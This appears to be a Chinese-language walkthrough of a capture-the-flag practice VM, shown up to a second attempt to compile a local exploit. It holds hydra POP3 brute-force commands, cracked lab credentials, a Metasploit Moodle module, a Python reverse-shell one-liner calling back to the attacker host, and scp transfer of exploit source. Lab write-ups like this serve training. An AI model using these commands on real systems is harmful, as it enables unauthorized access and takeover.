仅供个人娱乐
靶机信息
下载地址:https://pan.baidu.com/s/1dzs_qx-YwYHk-vanbUeIxQ
一、主机扫描
二、信息收集
三、漏洞的查找和利用
boris InvincibleHack3r
进行登录
转化为小写登录成功
pop3 为55007端口
爆破
hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007
boris secret1!
Boris secret1!
Natalya bird
登录pop3服务
natalya账户
boris账户
发现信息
或者使用邮箱
xenia RCP90rulez!
修改host 文件
windows出现问题(别尝试windows 有毒 慎重) 选择kali
修改hosts文件,访问severnaya-station.com/gnocertdir,是一个moodle学习管理系统
xenia RCP90rulez! 登录
信息收集
得到用户名:“doak”,我们继续爆破试试
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007
登录邮箱查看信息
USER dr_doak
PASS 4England!
得到密文:“eFdpbnRlcjE5OTV4IQ==”
密码为:“xWinter1995x!” 帐号为默认的 admin
登录 进行信息收集
use exploit/multi/http/moodle_cmd_exec
运行失败,百度参考大佬
设置路径为:Plugins— Text editors — TinyMCE HTML editor 在下拉选框中选择 “PSpellShell”
删除hosts文件内容 同样失败
搞不定 百度显示个人版本太高
第二种方法
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
信息收集
ssh上传
开启:/etc/init.d/ssh start
scp root@192.168.56.129:/root/1.c /tmp/
编译 对c文件进行编译,有gcc,cc,cang,文件默认是gcc
失败
修改1.c文件 重名2.c
scp root@192.168.56.129:/root/2.c /tmp/
